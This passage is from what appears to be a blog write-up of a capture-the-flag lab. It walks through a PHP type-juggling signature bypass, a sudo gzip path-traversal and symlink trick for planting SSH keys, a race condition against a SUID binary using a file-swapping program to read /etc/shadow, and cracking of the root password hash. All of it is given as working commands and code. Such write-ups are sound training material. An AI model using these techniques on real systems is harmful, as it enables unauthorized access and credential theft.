    We find a FLAG<\/code> environment variable containing another flag: CTF{h0p3_y0u_d1dnt_n0t1c3_m3_t00_14t3...}<\/code><\/p>\n\n\n\n
    Internal PHP app: Type Juggling<\/h2>\n\n\n\n
    After more enumeration, we find a few applications inside \/opt\/<\/code> by various users:<\/p>\n\n\n\n
    $ ls -l \/opt\ntotal 16\ndrwx------ 1 root     root     4096 Oct  2 20:25 casino\ndrwxrwxrwx 1 php      php      4096 Oct  2 20:25 signify\ndrwxr-xr-x 1 root     admin    4096 Oct  2 20:25 super-reader\ndrwxrwxrwx 1 www-data www-data 4096 Oct 19 20:01 webftp<\/code><\/pre>\n\n\n\n
    The signify<\/code> application has a readable index.php<\/code> file, and a non-readable secret.php<\/code> file. Listing the open ports using ss<\/code> internally, we can find a 127.0.0.1:8080<\/code> application. This is the Signify application.<\/p>\n\n\n\n
    $ ls -l\ntotal 8\n-rw-rw-rw- 1 php php 613 Oct  2 20:25 index.php\n-rw------- 1 php php  95 Oct  2 20:25 secret.php\n\n$ ss -tulpn\nNetid     State      Recv-Q      Send-Q           Local Address:Port            Peer Address:Port     Process\nudp       UNCONN     0           0                   127.0.0.11:52253                0.0.0.0:*\ntcp       LISTEN     0           4096                127.0.0.11:34883                0.0.0.0:*\ntcp       LISTEN     0           80                     0.0.0.0:3306                 0.0.0.0:*\ntcp       LISTEN     0           50                     0.0.0.0:139                  0.0.0.0:*\ntcp       LISTEN     0           128                    0.0.0.0:80                   0.0.0.0:*         users:(("ss",pid=175,fd=3),("bash",pid=133,fd=3),("sh",pid=132,fd=3),("script",pid=131,fd=3),("bash",pid=111,fd=3),("bash",pid=110,fd=3),("sh",pid=109,fd=3),("sh",pid=106,fd=3),("python3",pid=50,fd=3))\ntcp       LISTEN     0           4096                 127.0.0.1:8080                 0.0.0.0:*\ntcp       LISTEN     0           128                    0.0.0.0:22                   0.0.0.0:*\ntcp       LISTEN     0           5                      0.0.0.0:1337                 0.0.0.0:*\ntcp       LISTEN     0           50                     0.0.0.0:445                  0.0.0.0:*\ntcp       LISTEN     0           50                        [::]:139                     [::]:*\ntcp       LISTEN     0           128                       [::]:22                      [::]:*\ntcp       LISTEN     0           50                        [::]:445                     [::]:*\n\n$ curl localhost:8080\nNo command provided<\/code><\/pre>\n\n\n\n
    By reading the source code we can learn what the application expects:<\/p>\n\n\n\n
    <?php\nrequire 'secret.php';\n\nfunction generate_signature($data) {\n    global $signing_key;\n    $hash = hash_hmac('sha256', $data, $signing_key);\n    return substr($hash, 0, 4) . '-' . substr($hash, 4, 4);\n}\n\nif (isset($_GET['command'])) {\n    $command = $_GET['command'];\n    $signature = generate_signature($command);\n    if ($signature == $_GET['signature']) {\n        if (str_starts_with($command, 'getflag')) {\n            echo $flag . "\\n";\n        } else {\n            die("Command not found\\n");\n        }\n    } else {\n        die("Invalid signature\\n");\n    }\n} else {\n    die("No command provided\\n");\n}<\/code><\/pre>\n\n\n\n
    The ?command=<\/code> parameter must be provided, and a signature based on its value is calculated to then compare with the &signature=<\/code> parameter. If the command starts with getflag<\/code>, a flag is returned.<\/p>\n\n\n\n
    The signature algorithm seems to be using an unknown $signing_key<\/code> from the secret.php<\/code> file, which we cannot read. We also cannot leak the signature in any way as it is only ever compared, never returned. The comparison happens with a double-equals operator, which is interesting in PHP because it is the “loose comparison”<\/a> operator. With triple-equals (===<\/code>), types would have to match as well as value to become true. With loose comparison, PHP casts strings to integers in a lot of places, even when directly comparing strings:<\/p>\n\n\n\n
    $ php -a\nInteractive shell\n\nphp > var_dump("0" == "00");\nbool(true)<\/code><\/pre>\n\n\n\n
    This can lead to what are know as “Type Juggling” vulnerabilities. When PHP thinks both strings look like numbers, the comparison becomes based on those numbers instead of the strings. Some representations of numbers that PHP recognizes are:<\/p>\n\n\n\n
    123\n0123\n0.0123\n1e6    = 1000000\n2e-2   = 0.02<\/code><\/pre>\n\n\n\n
    In our case, the signature is a substring of two parts of a hex sha256 hash:<\/p>\n\n\n\n
    \n
    a1b2-c3d4<\/p>\n<\/blockquote>\n\n\n\n
    We learned that type juggling is only possible if both sides of the comparison are seen as a number, including the generated signature we match against. Could this ever be seen as a number? If we get lucky<\/em>, all positions may become numeric*, and the 4th character becomes an e<\/code>. It could look something like this:<\/p>\n\n\n\n
    \n
    123e-6789<\/p>\n<\/blockquote>\n\n\n\n
    This would be seen as a number by PHP, and because this scientific notation results in a tiny number, it evaluates to 0. We can match this with our signature=<\/code> value:<\/p>\n\n\n\n
    php > var_dump("123e-6789" == "0");\nbool(true)<\/code><\/pre>\n\n\n\n
    We just have to get lucky. Exactly how lucky, we can calculate. 0-9 are good, only a-f are bad characters in all positions (10\/16). One of the positions (index 4) needs to be e<\/code> (1\/16). On average, this should take around 1 \/ ((10\/16)**7 * (1\/16)) = 429<\/code> attempts. Not too difficult in a localhost connection.<\/p>\n\n\n\n
    We can write a script for it, or use a handy feature of curl<\/code> to enumerate all possible characters in a character set to go through lots of different inputs:<\/p>\n\n\n\n
    $ curl -o \/dev\/null -w '%{url}\\n' -s 'http:\/\/localhost:8080\/[1-3][a-c]'\nhttp:\/\/localhost:8080\/1a\nhttp:\/\/localhost:8080\/1b\nhttp:\/\/localhost:8080\/1c\nhttp:\/\/localhost:8080\/2a\nhttp:\/\/localhost:8080\/2b\nhttp:\/\/localhost:8080\/2c\nhttp:\/\/localhost:8080\/3a\nhttp:\/\/localhost:8080\/3b\nhttp:\/\/localhost:8080\/3c\n\n$ curl -s 'http:\/\/localhost:8080\/?command=getflag[1-9][1-9][1-9]&signature=0' | grep -v Invalid\nCTF{c4n_PHP_g3t_3v3n_CR4Z13R?}<\/code><\/pre>\n\n\n\n
    After around a thousand attempts, we pass the check and get printed the flag: CTF{c4n_PHP_g3t_3v3n_CR4Z13R?}<\/code><\/p>\n\n\n\n
    Privilege Escalation: www-data -> admin using gzip<\/h2>\n\n\n\n
    Enumerating privilege escalation options as www-data<\/code>, we quickly notice that sudo -l<\/code> shows that we are allowed to execute the gzip<\/code> binary as admin<\/code>:<\/p>\n\n\n\n
    $ sudo -l\nMatching Defaults entries for www-data on a38f0773842e:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin, use_pty\n\nUser www-data may run the following commands on a38f0773842e:\n (admin) NOPASSWD: \/bin\/gzip<\/code><\/pre>\n\n\n\n
    This is interesting, and one common method of exploitation is abusing the functionality of gzip<\/code> in this case to perform actions as admin<\/code> that allow us to become them. The site GTFOBins<\/a> collects many techniques to abuse these binaries and even has a section for gzip<\/a>. It says that we can read files with this but not much else.<\/p>\n\n\n\n
    One idea would be to read the SSH private key of admin<\/code> in their ~\/.ssh<\/code> directory, in hopes that they can authenticate as themselves.<\/p>\n\n\n\n
    $ sudo -u admin gzip -c \/home\/admin\/.ssh\/id_rsa | gzip -d\ngzip: \/home\/admin\/.ssh\/id_rsa: No such file or directory\n\ngzip: stdin: unexpected end of file<\/code><\/pre>\n\n\n\n
    It doesn’t appear that a file named id_rsa<\/code> exists there. There also aren’t any other interesting files to read as admin<\/code> that we can find. Instead, we should look for more vulnerabilities we can create with gzip<\/code> ourselves.<\/p>\n\n\n\n
    gzip<\/code> normally takes a .gz<\/code> file as input, decompresses it, and writes it to the same location with .gz<\/code> stripped off the end. One idea we can try is to place a symlink at the location where gzip will try to write the output file, potentially following the symlink and writing to its destination as admin<\/code>. One interesting destination would be \/home\/admin\/.ssh\/authorized_keys<\/code> to add our own keys and authenticate as admin<\/code> through SSH:<\/p>\n\n\n\n
    $ cd \/tmp\n$ echo content > keys\n$ gzip keys  # creates keys.gz\n$ ln -s \/tmp\/test keys\n$ ls -l keys*\nlrwxrwxrwx 1 www-data www-data 32 Oct 19 20:38 keys -> \/tmp\/test\n-rw-r--r-- 1 www-data www-data 33 Oct 19 20:38 keys.gz\n$ sudo -u admin gzip -d keys.gz\ngzip: keys already exists; do you wish to overwrite (y or n)? y\ngzip: keys: Operation not permitted<\/code><\/pre>\n\n\n\n
    Unfortunately, it seems to be unable to overwrite the symlink, presumably because it checks the permissions of the symlink keys<\/code> file itself, owned by www-data<\/code>.<\/p>\n\n\n\n
    For more ideas, we can check the help page of gzip --help<\/code> to find all possible options:<\/p>\n\n\n\n
    $ gzip --help\nUsage: gzip [OPTION]... [FILE]...\nCompress or uncompress FILEs (by default, compress FILES in-place).\n\nMandatory arguments to long options are mandatory for short options too.\n\n  -c, --stdout      write on standard output, keep original files unchanged\n  -d, --decompress  decompress\n  -f, --force       force overwrite of output file and compress links\n  -h, --help        give this help\n  -k, --keep        keep (don't delete) input files\n  -l, --list        list compressed file contents\n  -L, --license     display software license\n  -n, --no-name     do not save or restore the original name and timestamp\n  -N, --name        save or restore the original name and timestamp\n  -q, --quiet       suppress all warnings\n  -r, --recursive   operate recursively on directories\n      --rsyncable   make rsync-friendly archive\n  -S, --suffix=SUF  use suffix SUF on compressed files\n      --synchronous synchronous output (safer if system crashes, but slower)\n  -t, --test        test compressed file integrity\n  -v, --verbose     verbose mode\n  -V, --version     display version number\n  -1, --fast        compress faster\n  -9, --best        compress better<\/code><\/pre>\n\n\n\n
    The only option with input is -S, --suffix=SUF<\/code>. The description “use suffix SUF on compressed files” explains that it is the suffix instead of .gz<\/code> to add to the path when compressing a file. The -k<\/code> option to keep the original file is also handy for testing. Let’s play with these.<\/p>\n\n\n\n
    $ echo content > file\n$ gzip -k -S suffix file\n$ ls -la file*\n-rw-r--r-- 1 www-data www-data  8 Oct 19 20:46 file\n-rw-r--r-- 1 www-data www-data 33 Oct 19 20:46 filesuffix\n\n$ gzip -k -S other\/suffix file\ngzip: fileother\/suffix: No such file or directory\n\n$ mkdir fileother\n$ gzip -k file -S other\/suffix\n$ ls -l fileother\ntotal 4\n-rw-r--r-- 1 www-data www-data 33 Oct 19 20:46 suffix<\/code><\/pre>\n\n\n\n
    Interesting! By providing slashes in the suffix, we can write into a directory. Let’s generate an authorized_keys<\/code> file and try it with a directory traversal:<\/p>\n\n\n\n
    $ cd \/tmp\n$ ssh-keygen -f id_rsa\n$ cp id_rsa.pub authorized_keys\n$ mkdir authorized_keysX\n$ ls -la\ntotal 28\ndrwxrwxrwt 1 root     root     4096 Oct 19 13:29 .\ndrwxr-xr-x 1 root     root     4096 Oct 19 13:15 ..\n-rw-r--r-- 1 www-data www-data  575 Oct 19 13:29 authorized_keys\ndrwxr-xr-x 2 www-data www-data 4096 Oct 19 13:29 authorized_keysX\n-rw------- 1 www-data www-data 2610 Oct 19 13:29 id_rsa\n-rw-r--r-- 1 www-data www-data  575 Oct 19 13:29 id_rsa.pub\n\n$ sudo -u admin gzip -k authorized_keys -S 'X\/..\/..\/tmp\/test.gz'\n$ sudo -u admin gzip -d \/tmp\/test.gz\n$ cat test\nssh-rsa AAA...FoE= www-data@aa237a3bcf50<\/code><\/pre>\n\n\n\n
    Looking promising… We successfully wrote our SSH key to \/tmp\/test<\/code>. Now just change it to the admin’s ~\/.ssh<\/code> directory!<\/p>\n\n\n\n
    $ sudo -u admin gzip -k authorized_keys -S 'X\/..\/..\/home\/admin\/.ssh\/authorized_keys.gz'\ngzip: invalid suffix 'X\/..\/..\/home\/admin\/.ssh\/authorized_keys.gz'<\/code><\/pre>\n\n\n\n
    Suddenly, the command gives an invalid suffix<\/code> error. The file cannot be written with this suffix. Checking the gzip source code<\/a>, we can find out why:<\/p>\n\n\n\n
    #ifdef MAX_EXT_CHARS\n#  define MAX_SUFFIX  MAX_EXT_CHARS\n#else\n#  define MAX_SUFFIX  30\n#endif\n...\nif (z_len == 0 || z_len > MAX_SUFFIX) {\n    fprintf(stderr, "%s: invalid suffix '%s'\\n", program_name, z_suffix);\n    do_exit(ERROR);\n}<\/code><\/pre>\n\n\n\n
    If our suffix is larger than 30 characters, it is blocked! The suffix 'X\/..\/..\/home\/admin\/.ssh\/authorized_keys.gz'<\/code> is 42 characters long, way too much to fit into 30. We cannot exploit this with a path traversal.<\/p>\n\n\n\n
    Instead, we can combine this new knowledge with our previous idea of symlink. Instead of linking files, we can link the directories and have a much shorter suffix. By linking fileX<\/code> to \/home\/admin\/.ssh<\/code>, and then gzipping file<\/code> with the suffix X\/authorized_keys.gz<\/code>, the fileX\/authorized_keys.gz<\/code> path is accessed, and expanded to \/home\/admin\/.ssh\/authorized_keys.gz<\/code>. This allows us to decompress it in the next step using -d<\/code>:<\/p>\n\n\n\n
    $ cp id_rsa.pub file\n$ ln -s \/home\/admin\/.ssh fileX\n$ sudo -u admin gzip -k file -S 'X\/authorized_keys.gz'\n$ sudo -u admin gzip -d \/home\/admin\/.ssh\/authorized_keys.gz<\/code><\/pre>\n\n\n\n
    Extra note<\/em>: One player found another clever method that uses the path traversal in multiple steps instead of symlinks. By first writing to \/home\/admin\/.ss<\/code>, they are able to continue from that point of the path with smaller suffixes, circumventing the length limit of 30:<\/p>\n\n\n\n
    $ cp id_rsa.pub authorized_keys\n$ mkdir authorized_keysX\n$ sudo -u admin gzip -k \/tmp\/authorized_keys -S 'X\/..\/..\/home\/admin\/.ss.gz'\n$ sudo -u admin gzip -d \/home\/admin\/.ss.gz\n$ sudo -u admin gzip \/home\/admin\/.ss -S 'h\/authorized_keys.gz'\n$ sudo -u admin gzip -d \/home\/admin\/.ssh\/authorized_keys.gz<\/code><\/pre>\n\n\n\n
    This has successfully written our SSH public key to \/home\/admin\/.ssh\/authorized_keys<\/code>. That means we can now log in as admin<\/code> through SSH:<\/p>\n\n\n\n
    $ ssh -i id_rsa admin@localhost\n...\n$ id\nuid=1001(admin) gid=1001(admin) groups=1001(admin),100(users)\n$ getflag\nCongratulations!\nadmin's flag is: CTF{5t4Rt3D_fR0m_Th3_b0tT0m_n0w_W3r3_h3R3}<\/code><\/pre>\n\n\n\n
    Using getflag<\/code> we can obtain the second user flag: CTF{5t4Rt3D_fR0m_Th3_b0tT0m_n0w_W3r3_h3R3}<\/code><\/p>\n\n\n\n
    Privilege Escalation admin -> root using Race Condition<\/h2>\n\n\n\n
    After becoming the admin<\/code> user, we can now read the \/opt\/superreader<\/code> directory. It contains a SUID binary and its C source code:<\/p>\n\n\n\n
    $ ls -l \/opt\/super-reader\ntotal 28\n-rwsr-x--- 1 root admin 21264 Oct  2 20:25 main\n-rw-r----- 1 root admin  2061 Oct  2 20:25 main.c<\/code><\/pre>\n\n\n\n
    void error(const char *msg)\n{\n    if (errno)\n        fprintf(stderr, "\\x1b[31m\\x1b[1mError\\x1b[0m: %s (%s)\\n", msg, strerror(errno));\n    else\n        fprintf(stderr, "\\x1b[31m\\x1b[1mError\\x1b[0m: %s\\n", msg);\n    exit(1);\n}\n\nvoid status(const char *msg)\n{\n    fprintf(stderr, "\\x1b[96m\\x1b[1m[~]\\x1b[0m %s...\\n", msg);\n}\n\nvoid read_file(char *buf, const char *path)\n{\n    FILE *file = fopen(path, "r");\n    if (file == NULL)\n    {\n        error("failed to open file!");\n    }\n    fread(buf, 1, 0x100, file);\n    fclose(file);\n}\n\nint main(int argc, char **argv, char **envp)\n{\n    if (argc < 2)\n    {\n        error("Usage: super-reader <file>");\n    }\n\n    setreuid(geteuid(), geteuid());\n    setregid(getegid(), getegid());\n\n    \/\/ Check path\n    if (strncmp(argv[1], "\/tmp\/readerdata", 15) != 0)\n    {\n        error("path must start with `\/tmp\/readerdata`");\n    }\n    else if (strstr(argv[1], "..") != NULL)\n    {\n        error("path must not contain `..`");\n    }\n\n    \/\/ Check symlink\n    status("Checking for symlink");\n    struct stat stat_result;\n    if (lstat(argv[1], &stat_result) == -1)\n    {\n        error("failed to get file status!");\n    }\n    else if ((stat_result.st_mode & 0xf000) == 0xa000)\n    {\n        error("file must not be a symlink!");\n    }\n\n    \/\/ Check file permissions\n    status("Checking file permissions");\n    if (stat(argv[1], &stat_result) == -1)\n    {\n        error("failed to get directory status!");\n    }\n    else if (stat_result.st_uid != 0)\n    {\n        error("file must be owned root!");\n    }\n\n    \/\/ Check content\n    status("Checking content");\n    char buf[0x100];\n    read_file(buf, argv[1]);\n    if (strstr(buf, "SAFE_TO_READ") == NULL)\n    {\n        error("file must contain `SAFE_TO_READ`!");\n    }\n\n    \/\/ Read file\n    status("Reading file");\n    read_file(buf, argv[1]);\n    printf("\\x1b[3m%s\\x1b[0m", buf);\n\n    return 0;\n}<\/code><\/pre>\n\n\n\n
    A SUID binary will execute as the user who owns the file. In this case, that will be root<\/code>. It can perform actions as root, such as reading files that we normally cannot as admin<\/code>.
    We need to specify a path that starts with \/tmp\/readerdata<\/code>. One of the files we find in there is secret.txt<\/code>, so let’s try to read it:<\/p>\n\n\n\n
    $ ls -la \/tmp\/readerdata\ntotal 12\ndrwxr-xr-x 1 root root 4096 Oct  2 20:25 .\ndrwxrwxrwt 1 root root 4096 Oct 20 09:49 ..\n-rw------- 1 root root   82 Oct  2 20:25 secret.txt\n\n$ super-reader \/tmp\/readerdata\/secret.txt\n[~] Checking for symlink...\n[~] Checking file permissions...\n[~] Checking content...\n[~] Reading file...\nSAFE_TO_READ - You gotta try harder than that, your secret lies in the shadows...\n\n$ super-reader \/etc\/shadow\nError: path must start with `\/tmp\/readerdata`<\/code><\/pre>\n\n\n\n
    It checks various things before opening and reading the file, to try and make sure you cannot read arbitrary files. First, lstat()<\/code> is used to check if the path is a symlink. Then, it checks using stat()<\/code> if the file is owned by root<\/code>. Lastly, it reads the first 0x100 bytes and checks if “SAFE_TO_READ” is inside its contents, after which it is finally read again to be safely displayed.<\/p>\n\n\n\n
    All these checks make it difficult to read arbitrary files such as \/etc\/shadow<\/code> as root. Looking at the permissions of \/tmp\/readerdata<\/code>, we cannot even write in the directory as admin<\/code>. How can we make it read our file?<\/p>\n\n\n\n
    The trick is in the exact check that is performed on the path. It must start with \/tmp\/readerdata<\/code>, but \/tmp\/readerdataX<\/code> would also be valid! We can write in \/tmp<\/code>, so we can put this file and run the reader over it:<\/p>\n\n\n\n
    $ cd \/tmp\n$ echo 'SAFE_TO_READ content' > readerdataX\n$ super-reader \/tmp\/readerdataX\n[~] Checking for symlink...\n[~] Checking file permissions...\nError: file must be owned root!<\/code><\/pre>\n\n\n\n
    We get a little further, but still hit the problem that the file must be owned by root. Looking at man 2 stat<\/code>, we read that:<\/p>\n\n\n\n
    \n
    lstat()<\/code> is identical to stat()<\/code>, except that if pathname is a symbolic link, then it returns information about the link itself, not the file that the link refers to.<\/p>\n<\/blockquote>\n\n\n\n
    This means that the stat()<\/code> call will follow<\/em> the symlink, and return the owner of the file it points to. We could write a symlink to \/etc\/shadow<\/code> which would pass this check, but it would be blocked by the symlink check that happens earlier.<\/p>\n\n\n\n
    The symlink check uses lstat()<\/code> to check the properties of the file at the specified path. If \/tmp\/readerdataX<\/code> is a symlink to \/etc\/shadow<\/code>, it will detect that and block the attempt. But what will it do if not the file but the directory is a symlink? Let’s say we link \/tmp\/readerdataX<\/code> to \/etc<\/code>, and then give the path \/tmp\/readerdataX\/shadow<\/code>, which should expand to \/etc\/shadow<\/code>. Would it still be recognized as a symlink?<\/p>\n\n\n\n
    $ ln -s \/etc readerdataX\n$ super-reader \/tmp\/readerdataX\/shadow\n[~] Checking for symlink...\n[~] Checking file permissions...\n[~] Checking content...\nError: file must contain `SAFE_TO_READ`!<\/code><\/pre>\n\n\n\n
    We are getting further! The symlink and permission checks pass, but the file still doesn’t contain SAFE_TO_READ<\/code>. We also can’t add users to make it contain this text in \/etc\/shadow<\/code>. How will we ever get past this check?<\/p>\n\n\n\n
    Enter: Race Conditions. The logic of the C program calls read_file()<\/code> twice, first to search for SAFE_TO_READ<\/code> and second to print its contents. If we swap out the file for another one during this process, we may fool it before it tries to read the actual file and we swap it back. The idea is as follows:<\/p>\n\n\n\n
    \/\/! We passed all checks with `\/tmp\/readerdataX\/shadow` pointing to `\/etc\/shadow`\n\/\/! Now move a regular directory named `readerdataX` in its place with a file called `shadow` that contains "SAFE_TO_READ"\n\n\/\/ Check content\nstatus("Checking content");\nchar buf[0x100];\nread_file(buf, argv[1]);\nif (strstr(buf, "SAFE_TO_READ") == NULL)\n{\n    error("file must contain `SAFE_TO_READ`!");\n}\n\n\/\/! The content is verified and now we swap it back\n\/\/! `\/tmp\/readerdataX` points to `\/etc\/` again, and the code below will follow the symlink\n\n\/\/ Read file\nstatus("Reading file");\nread_file(buf, argv[1]);\nprintf("\\x1b[3m%s\\x1b[0m", buf);<\/code><\/pre>\n\n\n\n
    It is a tight window, but we can keep swapping these two states around and keep running the program until it works. One useful feature of Linux is the renameat2<\/code> syscall (see man renameat<\/code>). It has a RENAME_EXCHANGE<\/code> option to atomically exchange two paths (eg. swap them). Running this syscall in a loop between the symlink and directory, we can swap them incredibly fast.<\/p>\n\n\n\n
    Below is a simple program that takes two arguments to swap two paths as fast as possible.<\/p>\n\n\n\n
    #include <stdio.h>\n#include <fcntl.h>\n#include <unistd.h>\n#include <sys\/syscall.h>\n#include <linux\/fs.h>\n\nint main(int argc, char *argv[]) {\n    if (argc != 3) {\n        printf("Usage: %s <file1> <file2>\\n", argv[0]);\n        return 1;\n    }\n    while (1) {\n        syscall(SYS_renameat2, AT_FDCWD, argv[1], AT_FDCWD, argv[2], RENAME_EXCHANGE);\n    }\n\n    return 0;\n}\n\n\/\/ gcc swap.c -o swap -O3 -static<\/code><\/pre>\n\n\n\n
    We then need to prepare the two states. First, one where a directory symlink makes the path point to a regular root-owned file (\/etc\/passwd<\/code>), and then another directory that contains a SAFE_TO_READ<\/code> file to swap to temporarily:<\/p>\n\n\n\n
    $ ln -s \/etc readerdataX\n$ mkdir readerdataX2\n$ echo SAFE_TO_READ > readerdataX2\/shadow<\/code><\/pre>\n\n\n\n
    Now, in the first terminal, we will run the command until it contains the root:<\/code> keyword from \/etc\/shadow<\/code>:<\/p>\n\n\n\n
    while true; do super-reader \/tmp\/readerdataX\/shadow; done<\/code><\/pre>\n\n\n\n
    Next, we will start swapping the files rapidly with our swap<\/code> binary:<\/p>\n\n\n\n
    .\/swap readerdataX readerdataX2<\/code><\/pre>\n\n\n\n
    After starting to swap the files, we get all kinds of different error messages randomly, and sometimes it succeeds in reading \/etc\/shadow<\/code>!<\/p>\n\n\n\n
    Error: file must contain `SAFE_TO_READ`!\n[~] Checking for symlink...\n[~] Checking file permissions...\n[~] Checking content...\nError: file must contain `SAFE_TO_READ`!\n[~] Checking for symlink...\n[~] Checking file permissions...\nError: file must be owned root!\n[~] Checking for symlink...\n[~] Checking file permissions...\n[~] Checking content...\n[~] Reading file...\nroot:$1$IwHNPu0S$Q\/qIYVc\/w0fvQPmh4gOjw\/:19998:0:99999:7:::\ndaemon:*:19992:0:99999:7:::\nbin:*:19992:0:99999:7:::\nsys:*:19992:0:99999:7:::\nsync:*:19992:0:99999:7:::\ngames:*:19992:0:99999:7:::\nman:*:19992:0:99999:7:::\nlp:*:19992:0:99999:7:::\nmail:*:19992:0:996[~] Checking for symlink...\n[~] Checking file permissions...\n[~] Checking content...\n[~] Reading file...\nSAFE_TO_READ<\/code><\/pre>\n\n\n\n
    Extra note<\/em>: There was another solution without symlinking directories. Because the stat()<\/code> check also happens sequentially, we can Race Condition them just as well. It just takes a few more attempts.
    Therefore, we can create a file that is a symlink to \/etc\/shadow<\/code>, and another file that contains SAFE_TO_READ<\/code>. If it just so happens that during the symlink check the symlink is read, during the owner check the symlink is followed, during the content check the safe file is read, and finally while displaying the content the symlink is followed, we achieve the same result:<\/p>\n\n\n\n
    $ cd \/tmp\n$ mkdir readerdataX && cd readerdataX\n$ echo SAFE_TO_READ > a\n$ ln -s \/etc\/shadow b\n$ ls -l \/tmp\/readerdataX\ntotal 4\n-rw-r--r-- 1 admin admin 13 Oct 20 11:38 a\nlrwxrwxrwx 1 admin admin 11 Oct 20 11:38 b -> \/etc\/shadow\n\n$ \/tmp\/swap a b\n$ while true; do super-reader \/tmp\/readerdataX\/a; done 2>&1 | grep root:\nroot:$1$IwHNPu0S$Q\/qIYVc\/w0fvQPmh4gOjw\/:19998:0:99999:7:::<\/code><\/pre>\n\n\n\n
    We found the root password hash, and all that’s left is to try and crack it. Using John the Ripper<\/a>, we can pass the rockyou.txt<\/code> wordlist and quickly crack the MD5 password:<\/p>\n\n\n\n
    $ echo 'root:$1$IwHNPu0S$Q\/qIYVc\/w0fvQPmh4gOjw\/:19998:0:99999:7:::' > shadow\n$ john --wordlist=\/list\/rockyou.txt shadow\nWarning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"\nUse the "--format=md5crypt-long" option to force loading these as that type instead\nUsing default input encoding: UTF-8\nLoaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 512\/512 AVX512BW 16x3])\nWill run 16 OpenMP threads\nNote: Passwords longer than 5 [worst case UTF-8] to 15 [ASCII] rejected\nPress 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status\nKangar00ter      (?)\n1g 0:00:00:08 DONE (2024-10-20 13:26) 0.1206g\/s 1299Kp\/s 1299Kc\/s 1299KC\/s Katitho1988..Kalem100288\nUse the "--show" option to display all of the cracked passwords reliably\nSession completed.<\/code><\/pre>\n\n\n\n
    It found the password is “Kangar00ter”! We can log in as root using su root<\/code> and run getflag<\/code> to get the last flag:<\/p>\n\n\n\n
    $ su root\nPassword: Kangar00ter\n# id\nuid=0(root) gid=0(root) groups=0(root)\n# getflag\nCongratulations!\nroot's flag is: CTF{1c_ur_133t_h4ck3r_1337_c0ngr4t5_0n_r00t}<\/code><\/pre>\n\n\n\n
    We find our last flag: CTF{1c_ur_133t_h4ck3r_1337_c0ngr4t5_0n_r00t}<\/code><\/p>\n\n\n\n
    This was the finale of our capture the flag! Will you join us next time? Keep an eye on our socials!<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
    At the end of September, we hosted an online week-long Capture The Flag event on our Hacklabs platform. Participants had...<\/p>","protected":false},"author":9,"featured_media":6527,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"_et_pb_use_builder":"","_et_pb_old_content":"","_et_gb_content_width":"","content-type":"","footnotes":""},"categories":[14],"tags":[],"class_list":["post-6965","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-blog"],"acf":[],"_links":{"self":[{"href":"https:\/\/warpnet.nl\/en\/wp-json\/wp\/v2\/posts\/6965","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/warpnet.nl\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/warpnet.nl\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/warpnet.nl\/en\/wp-json\/wp\/v2\/users\/9"}],"replies":[{"embeddable":true,"href":"https:\/\/warpnet.nl\/en\/wp-json\/wp\/v2\/comments?post=6965"}],"version-history":[{"count":10,"href":"https:\/\/warpnet.nl\/en\/wp-json\/wp\/v2\/posts\/6965\/revisions"}],"predecessor-version":[{"id":7021,"href":"https:\/\/warpnet.nl\/en\/wp-json\/wp\/v2\/posts\/6965\/revisions\/7021"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/warpnet.nl\/en\/wp-json\/wp\/v2\/media\/6527"}],"wp:attachment":[{"href":"https:\/\/warpnet.nl\/en\/wp-json\/wp\/v2\/media?parent=6965"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/warpnet.nl\/en\/wp-json\/wp\/v2\/categories?post=6965"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/warpnet.nl\/en\/wp-json\/wp\/v2\/tags?post=6965"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}